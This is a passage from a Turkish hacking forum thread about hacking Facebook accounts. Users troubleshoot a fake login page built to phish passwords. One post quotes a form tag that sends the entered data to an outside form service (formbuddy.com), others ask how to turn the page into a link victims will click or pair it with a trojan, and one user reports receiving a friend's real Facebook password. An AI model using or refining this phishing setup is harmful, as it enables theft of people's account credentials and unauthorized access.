Facebook hesabı nasıl hacklenir(Döküman)

tabili

Yeni üye
20 Ağu 2011
4
0
ya o kısıye mesaj olarak attım ama lınkı gıbı gıtmedı en son body kodunun ustune <form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post"> lınkını ekledım ama lınk gıbı olmadı noscrıpt ı de bulamadım nasıl ya :(

su_perisi

Yeni üye
24 Ağu 2010
15
0
1. yöntemde kodları hazırladım html olarak kaydettim tıkladığımda site istediğim gibi açılıyor tamamda karşı taraf nasıl tıklıcak bi link haline getirmek gerekmiyomu? belkide işin en zor kısmını hallettim ama en kolay kısmını yapamıyorum bi türlü

thehack321

Yeni üye
17 Ağu 2011
1
0
Arkadaşlar ben yaptım oldu arkadaşımın facebook hesap şifresi geldi hotmail gelern kutusundan :)) Emeğinize sağlık.

oflumehmet61

Yeni üye
30 Ağu 2011
1
0
oflumehmet61

pkk ya ısyanım var 9 senendır bu işler ıcındeyım belkı cok bılqım yok ama emınım qı turkıye ıcın yaşiyorum bende bu sıteye uye olmak ıstedım sonucsda sızde turkıye ıcın calışıyonuz ne mutlu turkum dıyene pislaz:)

Silmapir

Yeni üye
31 Ağu 2011
5
0
Fakeyi yaptım ama tıkladığım zaten facebook sayfası geliyo ve kitli bi şekilde ne ID nede pass girebiliyorum.

radyocaglar

Yeni üye
8 Eki 2010
8
0
üstadım dediklerinin hepsini yaptım karşıma çıkan html uzantılı facebook giriş sayfası dil kodlaması yarı türkçe yarı farklı bir şekilde çıktı fakat burada anlayamadığım nokta bu dökümanı herhangi bir trojen ile birliktemi kurbana göndereceğiz yoksa direk denediğim zaman olmuyor yardımcı olursan sevinirim....

5 Eyl 2011
243
0
KONYA
kardeş deniyorum
Error!Username not filled

bu yazı cıkıyor , onayladım ve name fln hepsini yazdım her şeyi tamamladım bu yazı cıktı
sayfasına geldim , giriş yaptım gene aynı cıktı ne yapabilirm

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.